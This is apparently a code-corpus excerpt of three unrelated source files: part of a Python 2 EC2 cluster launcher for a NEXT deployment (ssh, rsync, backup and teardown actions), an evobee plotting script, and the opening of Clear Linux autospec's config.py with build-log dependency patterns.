"NEXT_BACKEND_GLOBAL_PORT":NEXT_BACKEND_GLOBAL_PORT,
"NEXT_FRONTEND_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
"NEXT_FRONTEND_GLOBAL_PORT":NEXT_FRONTEND_GLOBAL_PORT
}
with open('./templates/docker-compose.yml') as src:
with open(tmp_dir+'/docker-compose.yml', "w") as dest:
text = src.read()
env_vars = ''
for key in docker_compose_template_vars:
text = text.replace("{{" + key + "}}",str(docker_compose_template_vars[key]))
dest.write(text)
dest.close()
print text
# rsync the whole directory over to the master machine
command = [
'rsync', '-rv',
'-e', stringify_command(ssh_command(opts)),
"%s/" % tmp_dir,
"%s@%s:%s/" % (opts.user, master, EC2_NEXT_PATH)
]
subprocess.check_call(command)
# Remove the temp directory we created above
shutil.rmtree(tmp_dir)
def is_ssh_available(host, opts, print_ssh_output=True):
"""
Check if SSH is available on a host.
"""
s = subprocess.Popen(
ssh_command(opts) + ['-t', '-t', '-o', 'ConnectTimeout=3',
'%s@%s' % (opts.user, host), stringify_command('true')],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT # we pipe stderr through stdout to preserve output order
)
cmd_output = s.communicate()[0] # [1] is stderr, which we redirected to stdout
if s.returncode != 0 and print_ssh_output:
# extra leading newline is for spacing in wait_for_cluster_state()
print textwrap.dedent("""\n
Warning: SSH connection error. (This could be temporary.)
Host: {h}
SSH return code: {r}
SSH output: {o}
""").format(
h=host,
r=s.returncode,
o=cmd_output.strip()
)
return s.returncode == 0
def is_cluster_ssh_available(cluster_instances, opts):
"""
Check if SSH is available on all the instances in a cluster.
"""
for i in cluster_instances:
if not is_ssh_available(host=i.public_dns_name, opts=opts):
return False
else:
return True
def wait_for_cluster_state(conn, opts, cluster_instances, cluster_state):
"""
Wait for all the instances in the cluster to reach a designated state.
cluster_instances: a list of boto.ec2.instance.Instance
cluster_state: a string representing the desired state of all the instances in the cluster
value can be 'ssh-ready' or a valid value from boto.ec2.instance.InstanceState such as
'running', 'terminated', etc.
(would be nice to replace this with a proper enum: http://stackoverflow.com/a/1695250)
"""
sys.stdout.write(
"Waiting for cluster to enter '{s}' state.".format(s=cluster_state)
)
sys.stdout.flush()
start_time = datetime.now()
num_attempts = 0
while True:
time.sleep(10*( 1.*(num_attempts>0) + 0.1)) # seconds
for i in cluster_instances:
i.update()
statuses = conn.get_all_instance_status(instance_ids=[i.id for i in cluster_instances])
if cluster_state == 'ssh-ready':
if all(i.state == 'running' for i in cluster_instances) and \
all(s.system_status.status == 'ok' for s in statuses) and \
all(s.instance_status.status == 'ok' for s in statuses) and \
is_cluster_ssh_available(cluster_instances, opts):
break
else:
if all(i.state == cluster_state for i in cluster_instances):
break
num_attempts += 1
sys.stdout.write(".")
sys.stdout.flush()
sys.stdout.write("\n")
end_time = datetime.now()
print "Cluster is now in '{s}' state. Waited {t} seconds.".format(
s=cluster_state,
t=(end_time - start_time).seconds
)
def stringify_command(parts):
if isinstance(parts, str):
return parts
else:
return ' '.join(map(pipes.quote, parts))
def ssh_args(opts):
parts = ['-o', 'StrictHostKeyChecking=no']
parts += ['-o', 'UserKnownHostsFile=/dev/null']
if opts.identity_file is not None:
parts += ['-i', opts.identity_file]
return parts
def ssh_command(opts):
return ['ssh'] + ssh_args(opts)
# Run a command on a host through ssh, retrying up to five times
# and then throwing an exception if ssh continues to fail.
def ssh(host, opts, command):
tries = 0
while True:
try:
return subprocess.check_call(
ssh_command(opts) + ['-t', '-t', '%s@%s' % (opts.user, host),
stringify_command(command)])
except subprocess.CalledProcessError as e:
if tries > 5:
# If this was an ssh failure, provide the user with hints.
if e.returncode == 255:
raise UsageError(
"Failed to SSH to remote host {0}.\n" +
"Please check that you have provided the correct --identity-file and " +
"--key-pair parameters and try again.".format(host))
else:
raise e
print >> stderr, \
"Error executing remote command, retrying after 30 seconds: {0}".format(e)
time.sleep(30)
tries = tries + 1
# Backported from Python 2.7 for compatiblity with 2.6 (See SPARK-1990)
def _check_output(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
def ssh_read(host, opts, command):
return _check_output(
ssh_command(opts) + ['%s@%s' % (opts.user, host), stringify_command(command)])
def ssh_write(host, opts, command, arguments):
tries = 0
while True:
proc = subprocess.Popen(
ssh_command(opts) + ['%s@%s' % (opts.user, host), stringify_command(command)],
stdin=subprocess.PIPE)
proc.stdin.write(arguments)
proc.stdin.close()
status = proc.wait()
if status == 0:
break
elif tries > 5:
raise RuntimeError("ssh_write failed with error %s" % proc.returncode)
else:
print >> stderr, \
"Error {0} while executing remote command, retrying after 30 seconds".format(status)
time.sleep(30)
tries = tries + 1
# Gets a list of zones to launch instances in
def get_zones(conn, opts):
if opts.zone == 'all':
zones = [z.name for z in conn.get_all_zones()]
else:
zones = [opts.zone]
return zones
# Gets the number of items in a partition
def get_partition(total, num_partitions, current_partitions):
num_slaves_this_zone = total / num_partitions
if (total % num_partitions) - current_partitions > 0:
num_slaves_this_zone += 1
return num_slaves_this_zone
def real_main():
(opts, action, cluster_name) = parse_args()
print 'opts : ' + str(opts)
print
print 'cluster_name : ' + str(cluster_name)
print
if opts.ebs_vol_num > 8:
print >> stderr, "ebs-vol-num cannot be greater than 8"
sys.exit(1)
try:
conn = ec2.connect_to_region(opts.region)
except Exception as e:
print >> stderr, (e)
sys.exit(1)
# Select an AZ at random if it was not specified.
if opts.zone == "":
opts.zone = random.choice(conn.get_all_zones()).name
if action == "launch":
if opts.resume:
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
else:
(master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready'
)
setup_cluster(conn, master_nodes, slave_nodes, opts, True)
elif action == "destroy":
print "Are you sure you want to destroy the cluster %s?" % cluster_name
print "The following instances will be terminated:"
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
for inst in master_nodes + slave_nodes:
print "> %s" % inst.public_dns_name
msg = "ALL DATA ON ALL NODES WILL BE LOST!!\nDestroy cluster %s (y/N): " % cluster_name
response = raw_input(msg)
if response == "y":
print "Terminating master..."
for inst in master_nodes:
inst.terminate()
print "Terminating slaves..."
for inst in slave_nodes:
inst.terminate()
# Delete security groups as well
if opts.delete_groups:
print "Deleting security groups (this will take some time)..."
group_names = [cluster_name + "-master", cluster_name + "-slaves"]
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='terminated'
)
attempt = 1
while attempt <= 3:
print "Attempt %d" % attempt
groups = [g for g in conn.get_all_security_groups() if g.name in group_names]
success = True
# Delete individual rules in all groups before deleting groups to
# remove dependencies between them
for group in groups:
print "Deleting rules in security group " + group.name
for rule in group.rules:
for grant in rule.grants:
success &= group.revoke(ip_protocol=rule.ip_protocol,
from_port=rule.from_port,
to_port=rule.to_port,
src_group=grant)
# Sleep for AWS eventual-consistency to catch up, and for instances
# to terminate
time.sleep(30) # Yes, it does have to be this long :-(
for group in groups:
try:
# It is needed to use group_id to make it work with VPC
conn.delete_security_group(group_id=group.id)
print "Deleted security group %s" % group.name
except boto.exception.EC2ResponseError:
success = False
print "Failed to delete security group %s" % group.name
# Unfortunately, group.revoke() returns True even if a rule was not
# deleted, so this needs to be rerun if something fails
if success:
break
attempt += 1
if not success:
print "Failed to delete all security groups after 3 tries."
print "Try re-running in a few minutes."
elif action == "login":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
print "Logging into master " + master + "..."
proxy_opt = []
if opts.proxy_port is not None:
proxy_opt = ['-D', opts.proxy_port]
subprocess.check_call(
ssh_command(opts) + proxy_opt + ['-t', '-t', "%s@%s" % (opts.user, master)])
elif action == "reboot-slaves":
response = raw_input(
"Are you sure you want to reboot the cluster " +
cluster_name + " slaves?\n" +
"Reboot cluster slaves " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Rebooting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
print "Rebooting " + inst.id
inst.reboot()
elif action == "get-master":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
print 'public_dns_name : \t' + master_nodes[0].public_dns_name
print 'instance_type \t : \t' + master_nodes[0].instance_type
print 'num_cpus \t : \t' + str(instance_info[master_nodes[0].instance_type]['cpu'])
print 'memory (GB) \t : \t' + str(instance_info[master_nodes[0].instance_type]['memory'])
print 'cost ($/hr) \t : \t' + str(instance_info[master_nodes[0].instance_type]['cost_per_hr'])
elif action == "rsync":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
rsync_dir(LOCAL_NEXT_PATH, EC2_NEXT_PATH, opts, master)
rsync_docker_config(opts, master_nodes, slave_nodes)
elif action == "docker_up":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
docker_up(opts, master_nodes, slave_nodes)
elif action == "docker_login":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
docker_login(opts, master_nodes, slave_nodes)
elif action == "backup":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# opts.backup_filename
command = "cd %s; sudo docker exec nextdiscovery_mongodbbackup_1 /bin/bash -c 'python ./next/database/database_backup.py %s' " % (EC2_NEXT_PATH,opts.backup_filename)
ssh(master, opts, command)
elif action == "restore":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# opts.backup_filename
command = "cd %s; sudo docker exec nextdiscovery_mongodbbackup_1 /bin/bash -c 'python ./next/database/database_restore.py %s' " % (EC2_NEXT_PATH,opts.backup_filename)
ssh(master, opts, command)
elif action == "listbucket":
print "listbucket"
list_bucket(opts)
elif action == "createbucket":
print "createbucket"
createbucket(opts)
elif action == "stop":
response = raw_input(
"Are you sure you want to stop the cluster " +
cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
"BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
"AMAZON EBS IF IT IS EBS-BACKED!!\n" +
"All data on spot-instance slaves will be lost.\n" +
"Stop cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Stopping master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.stop()
print "Stopping slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
if inst.spot_instance_request_id:
inst.terminate()
else:
inst.stop()
elif action == "start":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
print "Starting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
print "Starting master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready'
)
setup_cluster(conn, master_nodes, slave_nodes, opts, False)
else:
print >> stderr, "Invalid action: %s" % action
sys.exit(1)
def main():
try:
real_main()
except UsageError, e:
print >> stderr, "\nError:\n", e
sys.exit(1)
if __name__ == "__main__":
logging.basicConfig()
main()
| apache-2.0 | 4,556,336,449,640,496,600 | 42.680637 | 206 | 0.581528 | false |
tim-taylor/evobee | utils/plot-mp-distrib-violin.py | 1 | 2936 | #!/usr/bin/env python3
#
# Script to generate a violin plot of the distribution of flower marker points
# from a collection of runs of evobee
#
# Usage: plot-mp-distrib.py title mpcountmpfile [mpcountmpfile2 [mpcountmpfile3 ...]]
# where each mpcountmpfile is a CSV format with layout: marker point, count
#
# Outputs: a graphics file called mp-distrib-violins-<title>.pdf
#
# Author: Tim Taylor (http://www.tim-taylor.com)
# Last update: 25 May 2020
import sys
import os
import csv
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
def main():
# check we have all of the required command line info
if len(sys.argv) < 3:
print("Usage: {} title mpcountmpfile [mpcountmpfile2 [mpcountmpfile3 ...]]"
.format(os.path.basename(sys.argv[0])), file=sys.stderr)
sys.exit(1)
# parse the command line info
title = sys.argv[1]
mpfilenames = [sys.argv[i] for i in range(2, len(sys.argv))]
#df = pd.DataFrame(index=[], columns=[0,1])
# initialise dataframe with a dummy entry of -1000 for each of the marker points of
# interest. This ensures the plot shows the full range of marker points even if some
# don't have any data points. We restrict the display of the y axis to values of
# 0 or higher so we don't see these dummy entries in the plot.
df = pd.DataFrame({ 0: range(380, 601, 10), 1: [-1000 for i in range(380, 601, 10)]})
for mpfile in mpfilenames:
if not os.path.exists(mpfile) or not os.path.isfile(mpfile):
print("Stats file '{}' does not exist or is not a regular file!".format(mpfile), file=sys.stderr)
exit(1)
dftmp = pd.read_csv(mpfile, header=None)
df = df.append(dftmp, ignore_index=True, sort=False)
df = df.rename(columns={0: "marker_point", 1: "count"})
#sns.set(style="whitegrid", palette="muted")
plt.xlim(375,605)
plt.ylim(0,5500)
plt.xticks(rotation=90)
plt.title(title)
#sns.violinplot(x="marker_point", y="count", data=df, inner=None)
#sns.swarmplot(x="marker_point", y="count", data=df, color="white", edgecolor="gray")
sns.swarmplot(x="marker_point", y="count", data=df)
#plt.show()
# plt.xlabel('Environment size')
# plt.ylabel('Fixation time')
# plt.legend(loc='upper left', prop={'size': 10})
# plt.title(title)
# plt.grid()
# plt.xlim(xmin-2, xmax+2)
# #plt.ylim(140,350)
# #plt.ylim(140,550)
# #plt.show()
# Replace spaces etc in title so we can use it in the filename of the graph
filename = 'mp-distrib-violins-'+title+'.pdf'
for ch in [' ',',','(',')','[',']']:
if ch in filename:
filename = filename.replace(ch,"-")
filename = filename.replace('---','-')
filename = filename.replace('--','-')
plt.savefig(filename)
##-------------------------------------------------------##
if __name__ == '__main__':
main()
| gpl-3.0 | 9,186,626,989,530,743,000 | 29.905263 | 109 | 0.623638 | false |
clearlinux/autospec | autospec/config.py | 1 | 50757 | #!/bin/true
#
# config.py - part of autospec
# Copyright (C) 2015 Intel Corporation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Parse config files
#
import configparser
import os
import re
import subprocess
import sys
import textwrap
from collections import OrderedDict
import check
import license
from util import call, print_warning, write_out
from util import open_auto
def read_pattern_conf(filename, dest, list_format=False, path=None):
"""Read a fail-pattern configuration file.
Read fail-pattern config file in the form of <pattern>, <package> and ignore lines starting with '#.'
"""
file_repo_dir = os.path.dirname(os.path.abspath(__file__))
file_conf_path = os.path.join(path, filename) if path else None
file_repo_path = os.path.join(file_repo_dir, filename)
if not os.path.isfile(file_repo_path):
return
if file_conf_path and os.path.isfile(file_conf_path):
# The file_conf_path version of a pattern will be used in case of conflict
file_path = [file_repo_path, file_conf_path]
else:
file_path = [file_repo_path]
for fpath in file_path:
with open(fpath, "r") as patfile:
for line in patfile:
if line.startswith("#"):
continue
# Make list format a dict for faster lookup times
if list_format:
dest[line.strip()] = True
continue
# split from the right a maximum of one time, since the pattern
# string might contain ", "
pattern, package = line.rsplit(", ", 1)
dest[pattern] = package.rstrip()
class Config(object):
"""Class to handle autospec configuration."""
def __init__(self, download_path):
"""Initialize Default configuration settings."""
self.content = None # hack to avoid circular init dependency
self.extra_configure = ""
self.extra_configure32 = ""
self.extra_configure64 = ""
self.extra_configure_avx2 = ""
self.extra_configure_avx512 = ""
self.config_files = set()
self.parallel_build = " %{?_smp_mflags} "
self.urlban = ""
self.extra_make = ""
self.extra32_make = ""
self.extra_make_install = ""
self.extra_make32_install = ""
self.extra_cmake = ""
self.extra_cmake_openmpi = ""
self.cmake_srcdir = ".."
self.subdir = ""
self.install_macro = "%make_install"
self.disable_static = "--disable-static"
self.prep_prepend = []
self.build_prepend = []
self.build_append = []
self.make_prepend = []
self.install_prepend = []
self.install_append = []
self.service_restart = []
self.patches = []
self.verpatches = OrderedDict()
self.extra_sources = []
self.autoreconf = False
self.custom_desc = ""
self.custom_summ = ""
self.set_gopath = True
self.license_fetch = None
self.license_show = None
self.git_uri = None
self.os_packages = set()
self.config_file = None
self.old_version = None
self.old_patches = list()
self.old_keyid = None
self.profile_payload = None
self.signature = None
self.yum_conf = None
self.failed_pattern_dir = None
self.alias = None
self.failed_commands = {}
self.ignored_commands = {}
self.maven_jars = {}
self.gems = {}
self.license_hashes = {}
self.license_translations = {}
self.license_blacklist = {}
self.qt_modules = {}
self.cmake_modules = {}
self.cves = []
self.download_path = download_path
self.default_pattern = "make"
self.pattern_strength = 0
self.sources = {"unit": [], "gcov": [], "tmpfile": [], "sysuser": [], "archive": [], "destination": [], "godep": [], "version": []}
self.archive_details = {}
self.conf_args_openmpi = '--program-prefix= --exec-prefix=$MPI_ROOT \\\n' \
'--libdir=$MPI_LIB --bindir=$MPI_BIN --sbindir=$MPI_BIN --includedir=$MPI_INCLUDE \\\n' \
'--datarootdir=$MPI_ROOT/share --mandir=$MPI_MAN -exec-prefix=$MPI_ROOT --sysconfdir=$MPI_SYSCONFIG \\\n' \
'--build=x86_64-generic-linux-gnu --host=x86_64-generic-linux-gnu --target=x86_64-clr-linux-gnu '
# Keep track of the package versions
self.versions = OrderedDict()
# Only parse the versions file once, and save the result for later
self.parsed_versions = OrderedDict()
# defines which files to rename and copy to autospec directory,
# used in commitmessage.py
self.transforms = {
'changes': 'ChangeLog',
'changelog.txt': 'ChangeLog',
'changelog': 'ChangeLog',
'change.log': 'ChangeLog',
'ChangeLog.md': 'ChangeLog',
'changes.rst': 'ChangeLog',
'changes.txt': 'ChangeLog',
'news': 'NEWS',
'meson_options.txt': 'meson_options.txt'
}
self.config_opts = {}
self.config_options = {
"broken_c++": "extend flags with '-std=gnu++98",
"use_lto": "configure build for lto",
"use_avx2": "configure build for avx2",
"use_avx512": "configure build for avx512",
"keepstatic": "do not remove static libraries",
"asneeded": "unset %build LD_AS_NEEDED variable",
"allow_test_failures": "allow package to build with test failures",
"skip_tests": "Do not run test suite",
"no_autostart": "do not require autostart subpackage",
"optimize_size": "optimize build for size over speed",
"funroll-loops": "optimize build for speed over size",
"fast-math": "pass -ffast-math to compiler",
"insecure_build": "set flags to smallest -02 flags possible",
"conservative_flags": "set conservative build flags",
"broken_parallel_build": "disable parallelization during build",
"pgo": "set profile for pgo",
"use_clang": "add clang flags",
"32bit": "build 32 bit libraries",
"nostrip": "disable stripping binaries",
"verify_required": "require package verification for build",
"security_sensitive": "set flags for security-sensitive builds",
"so_to_lib": "add .so files to the lib package instead of dev",
"dev_requires_extras": "dev package requires the extras to be installed",
"autoupdate": "this package is trusted enough to automatically update (used by other tools)",
"compat": "this package is a library compatibility package and only ships versioned library files",
"nodebug": "do not generate debuginfo for this package",
"openmpi": "configure build also for openmpi"
}
# simple_pattern_pkgconfig patterns
# contains patterns for parsing build.log for missing dependencies
self.pkgconfig_pats = [
(r"which: no qmake", "Qt"),
(r"XInput2 extension not found", "xi"),
(r"checking for UDEV\.\.\. no", "udev"),
(r"checking for UDEV\.\.\. no", "libudev"),
(r"XMLLINT not set and xmllint not found in path", "libxml-2.0"),
(r"error\: xml2-config not found", "libxml-2.0"),
(r"error: must install xorg-macros", "xorg-macros")
]
# simple_pattern patterns
# contains patterns for parsing build.log for missing dependencies
self.simple_pats = [
(r'warning: failed to load external entity "http://docbook.sourceforge.net/release/xsl/.*"', "docbook-xml"),
(r"gobject-introspection dependency was not found, gir cannot be generated.", "gobject-introspection-dev"),
(r"gobject-introspection dependency was not found, gir cannot be generated.", "glibc-bin"),
(r"Cannot find development files for any supported version of libnl", "libnl-dev"),
(r"/<http:\/\/www.cmake.org>", "cmake"),
(r"\-\- Boost libraries:", "boost-dev"),
(r"XInput2 extension not found", "inputproto"),
(r"^WARNING: could not find 'runtest'$", "dejagnu"),
(r"^WARNING: could not find 'runtest'$", "expect"),
(r"^WARNING: could not find 'runtest'$", "tcl"),
(r"VignetteBuilder package required for checking but installed:", "R-knitr"),
(r"You must have XML::Parser installed", "perl(XML::Parser)"),
(r"checking for Apache .* module support", "httpd-dev"),
(r"checking for.*in -ljpeg... no", "libjpeg-turbo-dev"),
(r"\* tclsh failed", "tcl"),
(r"\/usr\/include\/python3\.[0-9]+m\/pyconfig.h", "python3-dev"),
(r"checking \"location of ncurses\.h file\"", "ncurses-dev"),
(r"Can't exec \"aclocal\"", "automake"),
(r"Can't exec \"aclocal\"", "libtool"),
(r"configure: error: no suitable Python interpreter found", "python3-dev"),
(r"Checking for header Python.h", "python3-dev"),
(r"configure: error: No curses header-files found", "ncurses-dev"),
(r" \/usr\/include\/python3\.", "python3-dev"),
(r"to compile python extensions", "python3-dev"),
(r"testing autoconf... not found", "autoconf"),
(r"configure\: error\: could not find Python headers", "python3-dev"),
(r"checking for libxml libraries", "libxml2-dev"),
(r"checking for slang.h... no", "slang-dev"),
(r"configure: error: no suitable Python interpreter found", "python3"),
(r"configure: error: pcre-config for libpcre not found", "pcre"),
(r"checking for OpenSSL", "openssl-dev"),
(r"Unable to find the requested Boost libraries.", "boost-dev"),
(r"libproc not found. Please configure without procps", "procps-ng-dev"),
(r"configure: error: glib2", "glib-dev"),
(r"C library 'efivar' not found", "efivar-dev"),
(r"Has header \"efi.h\": NO", "gnu-efi-dev"),
(r"ERROR: Could not execute Vala compiler", "vala"),
(r".*: error: HAVE_INTROSPECTION does not appear in AM_CONDITIONAL", 'gobject-introspection-dev')
]
# failed_pattern patterns
# contains patterns for parsing build.log for missing dependencies
self.failed_pats = [
(r" ! ([a-zA-Z:]+) is not installed", 0, 'perl'),
(r" ([a-zA-Z]+\:\:[a-zA-Z]+) not installed", 1, None),
(r"(?:-- )?(?:Could|Did) (?:NOT|not) find ([a-zA-Z0-9_-]+)", 0, None),
(r" ([a-zA-Z0-9\-]*\.m4) not found", 0, None),
(r" exec: ([a-zA-Z0-9\-]+): not found", 0, None),
(r"([a-zA-Z0-9\-\_\.]*)\: command not found", 1, None),
(r"([a-zA-Z\-]*) (?:validation )?tool not found or not executable", 0, None),
(r"([a-zA-Z\-]+) [0-9\.]+ is required to configure this module; "
r"please install it or upgrade your CPAN\/CPANPLUS shell.", 0, None),
(r"-- (.*) not found.", 1, None),
(r".* /usr/bin/([a-zA-Z0-9-_]*).*not found", 0, None),
(r".*\.go:.*cannot find package \"(.*)\" in any of:", 0, 'go'),
(r"/usr/bin/env\: (.*)\: No such file or directory", 0, None),
(r"/usr/bin/python.*\: No module named (.*)", 0, None),
(r":in `require': cannot load such file -- ([a-zA-Z0-9\-\_:\/]+)", 0, 'ruby table'),
(r":in `require': cannot load such file -- ([a-zA-Z0-9\-\_:]+) ", 0, 'ruby'),
(r"Add the installation prefix of \"(.*)\" to CMAKE_PREFIX_PATH", 0, None),
(r"By not providing \"([a-zA-Z0-9]+).cmake\" in CMAKE_MODULE_PATH this project", 0, None),
(r"C library '(.*)' not found", 0, None),
(r"CMake Error at cmake\/modules\/([a-zA-Z0-9]+).cmake", 0, None),
(r"Can't locate [a-zA-Z0-9_\-\/\.]+ in @INC " r"\(you may need to install the ([a-zA-Z0-9_\-:]+) module\)", 0, 'perl'),
(r"Cannot find ([a-zA-Z0-9\-_\.]*)", 1, None),
(r"Checking for (.*?)\.\.\.no", 0, None),
(r"Checking for (.*?)\s*: not found", 0, None),
(r"Checking for (.*?)\s>=.*\s*: not found", 0, None),
(r"Could not find '([a-zA-Z0-9\-\_]*)' \([~<>=]+ ([0-9.]+).*\) among [0-9]+ total gem", 0, 'ruby'),
(r"Could not find gem '([a-zA-Z0-9\-\_]+) \([~<>=0-9\.\, ]+\) ruby'", 0, 'ruby'),
(r"Could not find suitable distribution for Requirement.parse\('([a-zA-Z\-\.]*)", 0, None),
(r"Download error on https://pypi.python.org/simple/([a-zA-Z0-9\-\._:]+)/", 0, 'pypi'),
(r"Downloading https?://.*\.python\.org/packages/.*/.?/([A-Za-z]*)/.*", 0, None),
(r"ERROR: Could not find a valid gem '([a-zA-Z0-9\-\_\:]*)' \([>=]+ ([0-9.]+).*\)", 0, 'ruby'),
(r"ERROR: dependencies ['‘]([a-zA-Z0-9\-\.]*)['’].* are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependencies ['‘].*['’], ['‘]([a-zA-Z0-9\-\.]*)['’],.* are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependencies.*['‘]([a-zA-Z0-9\-\.]*)['’] are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependency ['‘]([a-zA-Z0-9\-\.]*)['’] is not available for package ['‘].*['’]", 0, 'R'),
(r"Error: Unable to find (.*)", 0, None),
(r"Error: package ['‘]([a-zA-Z0-9\-\.]*)['’] required by", 0, 'R'),
(r"Gem::LoadError: Could not find '([a-zA-Z0-9\-\_]*)'", 0, 'ruby'),
(r"ImportError:.* No module named '?([a-zA-Z0-9\-\._]+)'?", 0, 'pypi'),
(r"ImportError\: ([a-zA-Z]+) module missing", 0, None),
(r"ImportError\: (?:No module|cannot import) named? (.*)", 0, None),
(r"LoadError: cannot load such file -- ([a-zA-Z0-9\-:\/\_]+)", 0, 'ruby table'),
(r"LoadError: cannot load such file -- ([a-zA-Z0-9\-:]+)/.*", 0, 'ruby'),
(r"ModuleNotFoundError.*No module named (.*)", 0, None),
(r"Native dependency '(.*)' not found", 0, "pkgconfig"),
(r"No library found for -l([a-zA-Z\-])", 0, None),
(r"No (?:matching distribution|local packages or working download links) found for ([a-zA-Z0-9\-\.\_]+)", 0, 'pypi'),
(r"No package '([a-zA-Z0-9\-:]*)' found", 0, 'pkgconfig'),
(r"No rule to make target `(.*)',", 0, None),
(r"Package (.*) was not found in the pkg-config search path.", 0, 'pkgconfig'),
(r"Package '([a-zA-Z0-9\-:]*)', required by '.*', not found", 0, 'pkgconfig'),
(r"Package which this enhances but not available for checking: ['‘]([a-zA-Z0-9\-]*)['’]", 0, 'R'),
(r"Perhaps you should add the directory containing `([a-zA-Z0-9\-:]*)\.pc'", 0, 'pkgconfig'),
(r"Program (.*) found: NO", 0, None),
(r"Target '[a-zA-Z0-9\-]' can't be generated as '(.*)' could not be found", 0, None),
(r"Unable to `import (.*)`", 0, None),
(r"Unable to find '(.*)'", 0, None),
(r"WARNING: [a-zA-Z\-\_]+ dependency on ([a-zA-Z0-9\-\_:]*) \([<>=~]+ ([0-9.]+).*\) .*", 0, 'ruby'),
(r"Warning: prerequisite ([a-zA-Z:]+) [0-9\.]+ not found.", 0, 'perl'),
(r"Warning\: no usable ([a-zA-Z0-9]+) found", 0, None),
(r"You need ([a-zA-Z0-9\-\_]*) to build this program.", 1, None),
(r"[Dd]ependency (.*) found: NO \(tried pkgconfig(?: and cmake)?\)", 0, 'pkgconfig'),
(r"[Dd]ependency (.*) found: NO", 0, None),
(r"[a-zA-Z0-9\-:]* is not installed: cannot load such file -- rdoc/([a-zA-Z0-9\-:]*)", 0, 'ruby'),
(r"\/bin\/ld: cannot find (-l[a-zA-Z0-9\_]+)", 0, None),
(r"^.*By not providing \"Find(.*).cmake\" in CMAKE_MODULE_PATH this.*$", 0, None),
(r"^.*Could not find a package configuration file provided by \"(.*)\".*$", 0, None),
(r"^.*\"(.*)\" with any of the following names.*$", 0, None),
(r"[Cc]hecking for (.*) (?:support|development files|with pkg-config)?\.\.\. [Nn]o", 0, None),
(r"checking (.*?)\.\.\. no", 0, None),
(r"checking for (.*) in default path\.\.\. not found", 0, None),
(r"checking for (.*)... configure: error", 0, None),
(r"checking for (.*?)\.\.\. no", 0, None),
(r"checking for [a-zA-Z0-9\_\-]+ in (.*?)\.\.\. no", 0, None),
(r"checking for library containing (.*)... no", 0, None),
(r"checking for perl module ([a-zA-Z:]+) [0-9\.]+... no", 0, 'perl'),
(r"configure: error: (?:pkg-config missing|Unable to locate) (.*)", 0, None),
(r"configure: error: ([a-zA-Z0-9]+) (?:is required to build|not found)", 0, None),
(r"configure: error: Cannot find (.*)\. Make sure", 0, None),
(r"fatal error\: (.*)\: No such file or directory", 0, None),
(r"make: ([a-zA-Z0-9].+): (?:Command not found|No such file or directory)", 0, None),
(r"meson\.build\:[\d]+\:[\d]+\: ERROR: C library \'(.*)\' not found", 0, None),
(r"there is no package called ['‘]([a-zA-Z0-9\-\.]*)['’]", 0, 'R'),
(r"unable to execute '([a-zA-Z\-]*)': No such file or directory", 0, None),
(r"warning: failed to load external entity " r"\"(/usr/share/sgml/docbook/xsl-stylesheets)/.*\"", 0, None),
(r"which\: no ([a-zA-Z\-]*) in \(", 0, None),
(r"you may need to install the ([a-zA-Z0-9_\-:\.]*) module", 0, 'perl'),
]
def set_build_pattern(self, pattern, strength):
"""Set the global default pattern and pattern strength."""
if strength <= self.pattern_strength:
return
self.default_pattern = pattern
self.pattern_strength = strength
def detect_build_from_url(self, url):
"""Detect build patterns and build requirements from the patterns detected in the url."""
# R package
if "cran.r-project.org" in url or "cran.rstudio.com" in url:
self.set_build_pattern("R", 10)
# python
